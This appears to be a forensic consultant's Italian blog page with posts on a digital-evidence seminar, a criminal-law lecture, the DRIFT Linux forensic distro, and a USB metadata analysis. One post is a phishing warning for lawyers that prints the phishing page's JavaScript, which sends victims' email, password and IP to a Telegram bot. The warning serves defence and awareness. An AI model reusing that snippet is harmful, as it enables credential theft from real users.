Archivi categoria: notizie

Le Prove Digitali nel Processo Civile – Convegno per Ordine Avvocati di Torino

Giovedì 28 maggio 2026 dalle 14:30 alle 17:30 si terrà in presenza presso l’Aula 74 – COA Torino, Palazzo di Giustizia, ingresso 18, primo piano – e in FAD tramite piattaforma zoom il seminario “Le Prove Digitali nel Processo Civile – Tipologia, Valore Probatorio, Produzione e Disconoscimento” durante il quale si parlerà di come tecnologia e informatica hanno consolidato nuovi scenari nella acquisizione forense di immagini, video e dati che, in caso di contenzioso, possono assumere rilevanza determinante al fine di fornire la prova della realtà fattuale.

Il seminario, organizzato dalla Commissione Scientifica dell’Ordine degli Avvocati di Torino è coordinato e moderato dagli Avv. Guido Napolitano, Avv. Fausta De Stefano ed Avv. Simona Castagna, Componenti della Commissione Scientifica del Consiglio dell’Ordine degli Avvocati di Torino e vede gli interventi di due relatori, il Dott. Paolo DAL CHECCO, Consulente Informatico Forense e il Prof. Avv. Alberto RONCO.

Il seminario approfondirà il tema della prova digitale nel processo civile, affrontando sia gli aspetti tecnici sia quelli giuridici. Verranno analizzati documenti informatici, immagini, video, email, screenshot, pagine web e dati cloud, con attenzione alla loro acquisizione, conservazione, autenticità e possibile manipolazione anche tramite Intelligenza Artificiale.

Saranno inoltre esaminati il valore probatorio dei documenti digitali, le modalità di produzione in giudizio, il disconoscimento e le più recenti pronunce giurisprudenziali in materia.

Il programma completo dell’evento “Le Prove Digitali nel Processo Civile” che si terrà a Torino presso il Tribunale, Aula 74, dalle 14:30 alle 17:30 di giovedì 28 maggio 2026 è il seguente:

Dott. Paolo DAL CHECCO, Consulente informatico forense.
I documenti informatici. Il documento informatico non sottoscritto elettronicamente.
Le immagini digitali, gli screenshot, i video digitali, le pagine web, i messaggi di posta elettronica, le scansioni di documenti cartacei. La ripartizione di informazioni e dati tra dispositivi, sistemi cloud e log di accesso. La copia forense e le modalità informatiche preferibilmente da attuare per la produzione dei documenti digitali nei diversi formati disponibili, anche in previsione di possibili future verifiche peritali. La verifica informatica della genuinità della prova informatica, in considerazione degli sviluppi della tecnologia, delle possibilità di modifica e manipolazione dei file e dell’avvento dell’Intelligenza Artificiale.

Prof. Avv. Alberto RONCO
L’inquadramento giuridico dei documenti informatici. La produzione del documento informatico. La necessità e/o l’opportunità di attestarne la conformità ad un originale e l’individuazione di che cosa sia questo originale. I termini e le modalità per la contestazione della provenienza e/o della veridicità del documento informatico (anche in funzione della tipologia della sua sottoscrizione). La contestazione di immagini digitali, screenshot, video digitali, pagine web, SMS, mail non certificate. Le conseguenze della contestazione e del disconoscimento e gli oneri della parte che ha prodotto il documento disconosciuto o contestato. La prova della trasmissione del documento e la distribuzione dell’onere relativo. Le più recenti pronunce di legittimità sui vari profili.

Le iscrizioni possono avvenire tramite la piattaforma “Riconosco”, la partecipazione è titolo per l’attribuzione di tre crediti formativi. l’evento potrà essere seguito in FAD gratuitamente dagli iscritti al Foro di Torino mentre per gli avvocati iscritti ad altri Fori la partecipazione prevede un costo di € 20,00: le indicazioni per il pagamento sono disponibili sulla piattaforma “Riconosco”.

La locandina ufficiale dell’evento “Le Prove Digitali nel Processo Civile – Tipologia, Valore Probatorio, Produzione e Disconoscimento” che si terrà presso il Tribunale di Torino giovedì 28 maggio 2026 è disponibile qui di seguito.

Convegno sulle Prove Digitali nel Processo Civile presso il Tribunale di TorinoDownload

Lezione di specializzazione per l’avvocato penalista sulla prova digitale

Sabato 22 maggio 2026 si terrà la lezione del Corso Biennale di Specializzazione dell’Avvocato Penalista dal titolo “Le perquisizioni e i sequestri probatori informatici – La gestione del reperto informatico – L’acquisizione della prova digitale in dibattimento” che terrò insieme all’Avv. Marco Pittiruti.

La lezione – che fa parte del I° Corso di specializzazione dell’avvocato penalista 2025 – 2027, organizzato da UCPI in convenzione con il CNF e i Dipartimenti Universitari di Milano Bicocca, Bologna, Benevento, Palermo, Roma Tre, Unitelma Sapienza – sarà in presenza dalla sede della Scuola di Roma, Via del Banco di S. Spirito n.42.

Per una problematica dell’ultimo momento io parteciperò da remoto, l’Avv. Pittiruti sarà invece in presenza ew sono certo che sarà un’ottima occasione di confronto su temi attuali in ambito legale oltre che tecnico informatico forense.

Qui di seguito la locandina dell’evento di Roma su “Le perquisizioni e i sequestri probatori informatici – La gestione del reperto informatico – L’acquisizione della prova digitale in dibattimento.”, tenuto dai docenti Dr. Paolo Dal Checco – Consulente informatico forense – e Avv. Marco Pittiruti – Associato di diritto processuale penale Università degli Studi di Teramo.

Corso Biennale di Specializzazione Avvocato Penalista a Roma

L’Unione Camere Penali Italiane ha organizzato, in collaborazione con il Consiglio Nazionale Forense, il Dipartimento di Giurisprudenza dell’Università degli Studi di Milano –Bicocca, il Dipartimento di Scienze Giuridiche dell’Università degli Studi di Bologna “Alma Mater Studiorum”, la Scuola Superiore di Studi Giuridici dell’Università degli Studi di Bologna “Alma Mater Studiorum” il Dipartimento di Giurisprudenza dell’Università degli Studi di Roma Tre, l’Università degli Studi di Roma Unitelma Sapienza, il Dipartimento di Diritto e società digitale dell’Università degli Studi di Roma Unitelma Sapienza, il Dipartimento di Giurisprudenza dell’Università degli Studi di Palermo, il Dipartimento di Diritto, Economia, Management e Metodi quantitativi dell’Università degli Studi del Sannio Benevento, il I Corso di specializzazione dell’avvocato penalista indirizzo “Diritto penale dell’informazione, di internet e delle nuove tecnologie”.

DRIFT Linux: la nuova live distro forense italiana

Nel panorama delle distribuzioni Linux dedicate alla digital forensics, arriva una novità interessante: DRIFT Linux, una live distro forense italiana progettata dall’esperto Massimiliano Dal Cero come un vero e proprio laboratorio per professionisti DFIR, consulenti d’informatica forense e forze dell’ordine.

DRIFTLINUX Distro Informatica Forense basata su Linux per acquisizioni e copie forensi

L’Italia è nota da anni per le live distro forensi, a partire dalle storiche DEFT e Caine, seguite da Tsurugi (alla quale Massimiliano Dal Cero contribuisce e continuerà a fornire supporto) e altre distro minori, si è però sempre sentita l’esigenza di un approccio minimale e con un occhio all’utilizzo pratico che gli informatici forensi fanno delle distribuzioni live, che poi possono essere utilizzate anche in macchine virtuali VM oppure installate su un PC.

Cos’è DRIFT Linux?

DRIFT nasce come sistema live pensato per operare direttamente sul campo in attività di acquisizione di dispositivi, raccolta di evidenze (anche da web e cloud) e alcune delle prime fasi di analisi. L’obiettivo di DRIFT Linux è offrire uno strumento immediato, pronto all’uso e completo già dal boot.

DRIFT Linux Digital Forensics Live Distro

La live distro per digital forensics DRIFT Linux si avvia in pochi secondi e mostra un menù completo di tutti gli strumenti indispensabili per attività d’incident response e informatica forense.

Caratteristiche principali

DRIFTLinux ha alcune caratteristiche che lo rendono un progetto interessante per chi si occupa d’informatica forense:

  • Live system operativo e portabile
    Nessuna installazione necessaria: avvio immediato e utilizzo su qualsiasi macchina.
  • Focus su acquisizione e raccolta evidenze
    Supporto per copia forense di dispositivi fisici e acquisizione di contenuti web completi, analizzabili offline, tramite un tool di web forensics.
  • Toolset integrato per DFIR
    DRIFT Linux Include strumenti essenziali per iniziare subito le attività di investigazione digitale.
  • Struttura modulare e razionale
    Progettata per essere organizzata, estendibile e facilmente mantenibile.

Essendo progettata in modo modulare e minimale, la live distro DRIFT Linux permette l’avvio in RAM tramite il parametro di boot al kernel “toram” selezionabile direttamente all’avvio.

DRIFT Linux boot in RAM con toram

Allo stesso modo, si può selezionare l’avvio grafico o testuale, verbose o con persistenza, eventualmente anche con una modalità avanzata e troubleshooting in caso di problemi di boot.

Per poter fare mount in modalità read-only viene fornito un “DRIFT Forensics Mount Manager” con lo scopo di permettere di selezionare e verificare la modalità di mount di ogni periferica.

DRIFTLinux Forensic Mount Manager

Altra piccola ma importante accortezza: la rete (ethernet, wifi, etc…) è sconnessa all’avvio a meno che l’utente non la abiliti dopo il boot tramite il “DRIFT Connection Panel”, in modo da rimanere silente anche sulla parte di connettività.

DRIFT Linux Network Connections Panel

Filosofia progettuale alla base di DRIFT Linux

Alcuni degli aspetti più interessanti dietro la distribuzione forense DRIFT Linux che emergono dal sito web e da una prima visione del prodotto sono:

  • Approccio pragmatico: strumenti utili, concreti, pronti all’uso sul campo
  • Modularità: ogni componente ha uno scopo chiaro, evitando complessità inutili
  • Portabilità totale: l’idea di “forensic lab in tasca” è centrale nello sviluppo
  • Efficienza operativa: ridurre il tempo tra acquisizione e analisi

Questa visione richiama la tradizione Linux/Unix, nella quale vengono privilegiati gli strumenti semplici, focalizzati e componibili, nell’ottica di una sempre maggiore efficacia e chiarezza.

Download e versioni a confronto

DRIFT Linux è disponibile per il download gratuito al link “Download DRIFT Linux” sulla home page del progetto, nella quale vengono proposte ben quattro alternative:

DRIFT Fast 2026.01: La versione standard, 1256MB di software preconfigurati per l’informatica forense e la gestione degli incidenti informatici (drift-linux-FAST-hybrid.iso, MD5: b5aa7a8e9e18cbe4b462dfa3bc81a4cd58ac31fc).

DRIFT Fast XS 2026.01: La versione ridotta per le sole acquisizioni forensi e primo intervento, 782 MB di strumenti pronti all’uso che possono essere caricati in RAM anche su PC con poca disponibilità di memoria (drift-linux-FAST-XS-hybrid.iso, MD5: 829e71ad69e0189b93e63afb93093564).

DRIFT Fast Micro 2026.01: La versione ultra minimalista, che a breve sarà disponibile e occuperà poco spazio sia su disco sia eventualmente in memoria, con i soli tool per acquisizioni forensi in contesti dove l’occupazione di risorse e la compatibilità possono essere un problema.

DRIFT Paddock 2026.01: La versione installabile per chi preferisce lavorare su una workstation in versione permanente e non dover avviare tutte le volte una distribuzione live che risiede soltanto in RAM.

Sempre nella pagina di Download di DRIFT Linux, Massimiliano Dal Cero ha deciso di ripubblicare le “vecchie glorie“, le distribuzioni DEFT Zero delle quali era già uno degli autori al tempo, distribuzioni che ancora oggi vengono utilizzate perché pur se obsolete si sono dimostrate stabili e minimali:

DEFT Zero 2017.1: La versione DEFT Zero originale, “senza zucchero e tool aggiunti”, ideale per sole acquisizioni forensi e massima compatibilità (deftZ-2017-1.iso, SHA256 beb575e34d948536474770c0af96c15111275e63e3e9975fa79fb337294a2cb0)

DEFT Zero 2018.2: nelle due versioni Original 2O (deftZ-2018-2O-resurrected.iso, SHA256 d207c31e880a46629a0a8c179502644ae76d3e10613bd7ee7a4a929a8ce0fff2) e Updated 2U (deftZ-2018-2U-resurrected.iso, SHA256: 112a7e3ebc5f063e7b80a3f035cb6dca498aec40323c2f0cc271e20c7f81a6dd)

Manuale d’uso e video tutorial

Il sito web contiene utile documentazione relativa al progetto, inclusi alcuni video tutorial di DRIFT Linux in azione che mostrano in modo immediato le caratteristiche principali della live distro.

Una volta scaricata la ISO della versione prescelta della live distro, è sufficiente creare una “live usb” tramite balenaEtcher, Rufus, Ventoy o dd e avviare la distribuzione dalla porta USB del PC ove s’intente utilizzare DRIFT Linux.

Attenzione al phishing che attacca le mailbox degli Avvocati

Un articolo che non parla d’informatica forense, come di consueto, ma è da leggere con attenzione e far girare in particolare tra gli avvocati: è importante saper riconoscere il phishing che sta colpendo gli studi legali italiani (e non solo) che porta a potenziali databreach a catena, dato che chi subisce l’attacco poi diventa vettore – verso i suoi contatti – di nuovi attacchi.

In questi giorni arrivano infatti agli avvocati email da parte di colleghi (ma anche clienti o collaboratori) che citano un documento di “Pagamento fattura” non allegato ma condiviso tramite OneNote, come mostrato nelle immagini allegate al post.

Email di phishing che arriva agli avvocati con un documento condiviso da aprire su OneNote

La mail ha come oggetto una frase tipo: “Studio Legale Associato XYZ ha condiviso la file Elementi condivisi il giorno 06-11-2025′ con te”.

Phishing ad avvocati e studi legali tramite falsa fattura condivisa su OneNote

Cliccando sul link si apre una pagina che indica che il documento contenente la fattura è crittografato ed è necessario loggarsi su Microsoft OneNote per accedervi:

"Avv. ABC - STUDIO LEGALE ASSOCIATO XYZ ho condiviso un nuovo documento con te
Pagamenti delle fattura.pdf(601 KB)
VISUALIZZARE IL DOCUMENTO CONDIVISO

Il documento è crittografato con password Microsoft, accedi con l'indirizzo e-mail in cui è stato ricevuto il documento.
Questo documento è stato analizzato alla ricerca di virus dal software Norton™ AntiVirus Security Standard 2025
© Condivisione di file Microsoft 2025"

Cliccando sul link “Visualizzare il documento condiviso” si giunge a una pagina con diversi login.

Phishing ad avvocati tramite condivisione fattura OneNote di Microsoft e furto credenziali username e password

E’ possibile inserire il proprio login con username e password per ogni tipo di account di posta elettronica che si possiede, partendo dai principali come Office365, Outlook, Rackspace, Aruba, PEC o anche altri account:

Accedi alla tua e-mail per visualizzare il documento condiviso.
Accedi qui sotto.
Accedi con Office365
Accedi con Outlook
Accedi con Rackspace
Accedi con Aruba Mail
Accedi con PEC
Accedi con Altra Posta

Inserendo le proprie credenziali ai vari link, queste vengono inviate agli attaccanti tramite una chiamata API a un bot Telegram:

forma.addEventListener("submit", e =>{ e.preventDefault(); let email = document.querySelector('#e-mail').value let pwd = document.querySelector('#pwd').value let ips = document.querySelector('#ipaddress').value fetch(`https://api.telegram.org/bot${bot.TOKEN}/sendMessage?chat_id=${bot.chatID}&text=Email:${email}=Password:=${pwd}=IP:=${ips}`, { method: "GET" }).then(success => { window.location.replace("https://www.onenote.com/"); }, error => { alert("Message not sent") console.log(error) })

In sostanza, gli attaccanti, per scaricare il file chiedono d’inserire su un finto sito Microsoft username e password di posta (Office365, Outlook, Rackspace, Aruba S.p.A., PEC o anche qualunque altra) ma ovviamente una volta loggati invece di mostrare la fattura:

1) gli attaccanti entrano nell’account di posta dello Studio;

2) se hanno tempo e voglia scaricano i messaggi e gli allegati;

3) scaricano la rubrica e inviano a tutti i contatti la stessa mail ricevuta sperando che anche loro si facciano trarre in inganno..

Le email che arrivano sono originali e autentiche, inviate dal vero account del collega avvocato, non sono spoofing e tendono a passare i controlli antispam, quindi l’unica prevenzione è non inserire la password al link con il documento condiviso. Se cliccate su link e andate avanti senza inserire credenziali non succede nulla.

Se avete già inserito user/password, gli attaccanti stanno potenzialmente scaricandosi i vostri messaggi, la rubrica e inviando ai vostri contatti lo stesso messaggio: cambiate subito password, loggatevi sulla webmail per chiudere eventuali altre sessioni aperte, attivate 2FA se già non lo avete, valutate se informare i contatti di non aprire link da voi ricevuti, se volete capire cosa hanno fatto gli attaccanti nel vostro account scaricate/chiedete i file di log del provider.

Se avete ricevuto mail simili a quelle allegate al post quindi cancellatele anche se provengono da colleghi oppure se avete voglia inviatemi il file EML che ne sto collezionando diversi per analizzare come il phishing sta diffondendosi tra i professionisti e quali tecniche utilizzano gli attaccanti per rendere credibile il phishing.

Analisi forense di pendrive USB e metadati Word per Le Iene

Martedì 4 novembre 2025 è andato in onda il servizio de Le Iene dove, come perito forense, ho aiutato la Iena Filippo Roma a trovare riferimenti a potenziali autori all’interno di una pendrive USB contenente un documento Word.

Il servizio de Le Iene parla di una questione nella quale non mi addentro, poiché mi è stato semplicemente chiesto se fosse possibile trovare l’autore, il proprietario o l’utilizzatore di una pendrive USB, in particolare basandomi su di un documento Microsoft Office Word in essa contenuto.

Consulente Informatico per Le Iene su analisi metadati pendrive USB

L’attività di perizia informatica è iniziata con la realizzazione di una copia forense della pendrive USB – così da cristallizzarne e preservarne il contenuto all’interno di una immagine forense con estensione EWF, in modo da poterla successivamente analizzare.

L’analisi forense svolta come perito informatico per Le Iene – in particolare per Filippo Roma e l’autore del servizio TV – è stata eseguita tramite il software X-Ways Forensics, con il quale ho eseguito carving, recupero dati e ricostruzione del filesystem, inclusi file cancellati e relativi metadati EXIF di immagini, OOXML di file Word e XMP di file PDF.

Le Iene - Paolo Dal Checco e analisi forense su metadati di documento Word

Il software XWF – X-Ways Forensics – permette a chi opera come consulente informatico forense di eseguire attività di analisi e perizia informatica su immagini forensi al fine di ricostruire file eliminati e categorizzare metadati ed evidenze digitali

Come contro-verifica – in ambito informatica forense è sempre importante l’attività di cross examination – ho utilizzato anche il noto software open source Exiftool, così da poter confermare le risultanze ottenute mediante il tool forense XWF e produrre quindi una valutazione circa l’attribuzione del file.

Paolo Dal Checco - Perito Informatico per Le Iene e analisi dei metadati file word con exiftool

Nella pendrive erano presenti ulteriori file di tipo “.Trashes”, “.TemporaryItems”, “.Spotlight-V100” con i subfolder “Store-V2” e all’interno i vari journal e index, ma in nessuno di tali artefatti erano contenute indicazioni circa l’attribuzione della pendrive o meglio, si sono trovati gli stessi riscontri presenti nel file Word oggetto di analisi.

Dal punto di vista informatico forense, la presenza di uno specifico nominativo nel campo “Creator/Author” o “Last Modified By/Last Saved By” non indica necessariamente l’autore del documento o dell’ultima modifica ma il nominativo con cui è stato configurato il software utilizzato per generare il documento Word.

In genere, quindi, quando si rileva un nominativo nel campo autore del documento o dell’ultima modifica al documento in un file Word – ma anche Excel o Powerpoint, oltre a PDF o eventuali file JPG, multimediali, etc… – possono verificarsi tre situazioni:

  1. Il nominativo presente nei dati EXIF/XMP/OOXML può effettivamente essere l’autore del documento;
  2. Lo user indicato nei metadati del file Word può essere quello con cui è stato configurato il sistema utilizzato per creare o modificare il file ma il file non è stato creato/modificato da tale soggetto;
  3. Lo username reperibile nei meta dati può essere stato inserito apposta nel file da terzi per forzare l’attribuzione di un file a un soggetto (es. per attribuirgli la creazione/modifica del file).

Ovviamente dall’analisi forense di un solo file non è possibile distinguere con una perizia informatica in quale casistica di quelle riportate sopra rientri, se non esaminando ulteriori elementi (es. altri file presenti sul dispositivo, percorsi/path del filesystem lasciati nei file, negli indici o nei dati temporanei, etc…) e quindi non si possono fare ulteriori valutazioni.

Proprio per questo motivo è importante procedere con la massima cautela quando si ricavano informazioni dai metadati dei file, valutando le possibili interpretazioni in base a ulteriori elementi, anche investigativi, che possano confermare o meno l’attendibilità dell’attribuzione.